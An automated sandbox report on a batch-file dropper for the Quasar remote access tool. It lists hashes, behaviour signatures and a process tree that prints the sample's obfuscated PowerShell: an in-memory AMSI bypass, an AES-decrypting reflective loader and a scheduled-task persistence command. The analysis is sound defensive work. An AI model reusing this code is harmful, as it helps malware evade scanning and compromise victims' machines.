Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-01-2025 05:55

General

  • Target

    3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat

  • Size

    3.4MB

  • MD5

    f06fd82f34a91ec7ec3a2f242daa5699

  • SHA1

    31625c87b890569ab23b1556d37400deefbbe03c

  • SHA256

    3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b

  • SHA512

    31b7e30d6d3194eb83619b8006d38a87e4cb807aadc284f1c4acc5c03f701a154bad50a13a730b211443f9730c46e15b13c00f4b3994b53261efc17fd685b50a

  • SSDEEP

    24576:ouCQ1lZkZ4Cs5O1MvmcQX4oZZtOHiBmXj5vAj/oSpaCj76RzfkvS9GnWN+uuQG48:+EHLmI4OH9mjra3avfWIdW1M399qlY

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{bc05c5b5-8ab0-42f5-8cc8-d0191ad8dae5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2952
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:428
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1036
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1136
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1144
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1156
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2788
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PHnmMaDyYvVP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FrUZVLKCqCrfSh,[Parameter(Position=1)][Type]$CsHzUwyQVr)$qITvUtfkArS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'du'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+'l'+''+'e'+''+'g'+'a'+'t'+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+'C'+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+[Char](115)+'',[MulticastDelegate]);$qITvUtfkArS.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'cia'+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eByS'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$FrUZVLKCqCrfSh).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$qITvUtfkArS.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+'t'+',Virtua'+'l'+'',$CsHzUwyQVr,$FrUZVLKCqCrfSh).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $qITvUtfkArS.CreateType();}$SpEHOpUwNwaIe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+'N'+'a'+'t'+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$kAtxpwBnnLoCsb=$SpEHOpUwNwaIe.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+'Ad'+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+',S'+[Char](116)+'a'+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FPyKeenkZsOeDVbXEDg=PHnmMaDyYvVP @([String])([IntPtr]);$TxwTAFwvwmuFepCXuVRMhJ=PHnmMaDyYvVP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hOrceNjTGUj=$SpEHOpUwNwaIe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+''+[Char](72)+'and'+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'32.'+'d'+''+[Char](108)+'l')));$JCLUaaeeOaemMb=$kAtxpwBnnLoCsb.Invoke($Null,@([Object]$hOrceNjTGUj,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+'L'+''+'i'+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$kkVlSKAeXMxjxWvSN=$kAtxpwBnnLoCsb.Invoke($Null,@([Object]$hOrceNjTGUj,[Object](''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$ylHPNWu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JCLUaaeeOaemMb,$FPyKeenkZsOeDVbXEDg).Invoke('a'+'m'+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+'ll');$TdrOxtfpAsDIbcvOi=$kAtxpwBnnLoCsb.Invoke($Null,@([Object]$ylHPNWu,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+'f'+'fer')));$POWeJBLhay=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kkVlSKAeXMxjxWvSN,$TxwTAFwvwmuFepCXuVRMhJ).Invoke($TdrOxtfpAsDIbcvOi,[uint32]8,4,[ref]$POWeJBLhay);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TdrOxtfpAsDIbcvOi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kkVlSKAeXMxjxWvSN,$TxwTAFwvwmuFepCXuVRMhJ).Invoke($TdrOxtfpAsDIbcvOi,[uint32]8,0x20,[ref]$POWeJBLhay);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'n'+''+'y'+''+[Char](97)+''+[Char](45)+''+'s'+'ta'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3236
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1224
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1244
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1288
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1396
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1408
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2656
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1488
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1572
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1580
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1652
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1716
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1756
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1764
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1852
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:2000
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:2024
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1448
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1704
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2072
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2152
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2244
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2372
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2524
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2532
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2680
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2764
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:2796
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2824
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2844
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2872
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2920
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3112
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                    PID:3444
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat"
                                                                                      2⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:708
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function LLppO($CPtuP){ $YqYGn=[System.Security.Cryptography.Aes]::Create(); $YqYGn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $YqYGn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $YqYGn.Key=[System.Convert]::FromBase64String('nKDQKPFRDB4UaeLOndYu+4k+Q0wQVZw47HPOfUUgfBg='); $YqYGn.IV=[System.Convert]::FromBase64String('UfEYRi/5OKMR5zSX3oNZ8w=='); $BfudD=$YqYGn.CreateDecryptor(); $SnIMa=$BfudD.TransformFinalBlock($CPtuP, 0, $CPtuP.Length); $BfudD.Dispose(); $YqYGn.Dispose(); $SnIMa;}function OnLZm($CPtuP){ IEX '$rTpAl=New-Object System.IO.M*em*or*yS*tr*ea*m(,$CPtuP);'.Replace('*', ''); IEX '$Zfmrm=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$HkwXH=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($rTpAl, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $HkwXH.CopyTo($Zfmrm); $HkwXH.Dispose(); $rTpAl.Dispose(); $Zfmrm.Dispose(); $Zfmrm.ToArray();}function IgGdL($CPtuP,$sHjZk){ IEX '$GqVau=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$CPtuP);'.Replace('*', ''); IEX '$jCGEA=$GqVau.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jCGEA.*I*n*v*o*k*e*($null, $sHjZk);'.Replace('*', '');}$jvfbU = 'C:\Users\Admin\AppData\Local\Temp\3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat';$host.UI.RawUI.WindowTitle = $jvfbU;$LDiXZ=[System.IO.File]::ReadAllText($jvfbU).Split([Environment]::NewLine);foreach ($YMuuu in $LDiXZ) { if ($YMuuu.StartsWith(':: ')) { $qgoDd=$YMuuu.Substring(3); break; }}$cHpKY=[string[]]$qgoDd.Split('\');IEX '$kTXqv=OnLZm (LLppO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($cHpKY[0])));'.Replace('*', '');IEX '$OpwNO=OnLZm (LLppO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($cHpKY[1])));'.Replace('*', '');IgGdL $kTXqv $null;IgGdL $OpwNO (,[string[]] ('')); "
                                                                                        3⤵
                                                                                          PID:384
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -WindowStyle Hidden
                                                                                          3⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in Windows directory
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1776
                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                            "schtasks" /create /ru builtin\Users /sc onlogon /tn $nya-Loli_ /F /RL HIGHEST /tr "cmd.exe /b /c start \"cmd.exe\" \"C:\Windows\$nya-onimai3\$nya-Loli.bat\""
                                                                                            4⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1820
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process 'C:\Windows\$nya-onimai3\$nya-Loli.bat'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1236
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
                                                                                              5⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4300
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                6⤵
                                                                                                  PID:3404
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo function LLppO($CPtuP){ $YqYGn=[System.Security.Cryptography.Aes]::Create(); $YqYGn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $YqYGn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $YqYGn.Key=[System.Convert]::FromBase64String('nKDQKPFRDB4UaeLOndYu+4k+Q0wQVZw47HPOfUUgfBg='); $YqYGn.IV=[System.Convert]::FromBase64String('UfEYRi/5OKMR5zSX3oNZ8w=='); $BfudD=$YqYGn.CreateDecryptor(); $SnIMa=$BfudD.TransformFinalBlock($CPtuP, 0, $CPtuP.Length); $BfudD.Dispose(); $YqYGn.Dispose(); $SnIMa;}function OnLZm($CPtuP){ IEX '$rTpAl=New-Object System.IO.M*em*or*yS*tr*ea*m(,$CPtuP);'.Replace('*', ''); IEX '$Zfmrm=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$HkwXH=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($rTpAl, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $HkwXH.CopyTo($Zfmrm); $HkwXH.Dispose(); $rTpAl.Dispose(); $Zfmrm.Dispose(); $Zfmrm.ToArray();}function IgGdL($CPtuP,$sHjZk){ IEX '$GqVau=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$CPtuP);'.Replace('*', ''); IEX '$jCGEA=$GqVau.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jCGEA.*I*n*v*o*k*e*($null, $sHjZk);'.Replace('*', '');}$jvfbU = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $jvfbU;$LDiXZ=[System.IO.File]::ReadAllText($jvfbU).Split([Environment]::NewLine);foreach ($YMuuu in $LDiXZ) { if ($YMuuu.StartsWith(':: ')) { $qgoDd=$YMuuu.Substring(3); break; }}$cHpKY=[string[]]$qgoDd.Split('\');IEX '$kTXqv=OnLZm (LLppO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($cHpKY[0])));'.Replace('*', '');IEX '$OpwNO=OnLZm (LLppO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($cHpKY[1])));'.Replace('*', '');IgGdL $kTXqv $null;IgGdL $OpwNO (,[string[]] ('')); "
                                                                                                  6⤵
                                                                                                    PID:3576
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell.exe -WindowStyle Hidden
                                                                                                    6⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:672
                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                      "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
                                                                                                      7⤵
                                                                                                        PID:4380
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                        7⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4948
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                          8⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4296
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                            1⤵
                                                                                              PID:3476
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3672
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:3852
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4020
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:8
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:3740
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:2344
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                          1⤵
                                                                                                            PID:5076
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                            1⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:4544
                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:3704
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                              1⤵
                                                                                                                PID:432
                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                1⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:956
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                  PID:4664
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                  1⤵
                                                                                                                    PID:2080
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:4152
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                      1⤵
                                                                                                                        PID:1628
                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                        1⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Enumerates system info in registry
                                                                                                                        PID:3044
                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                        1⤵
                                                                                                                          PID:1804
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                          1⤵
                                                                                                                            PID:1368
                                                                                                                          • C:\Windows\System32\mousocoreworker.exe
                                                                                                                            C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4780
                                                                                                                            • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
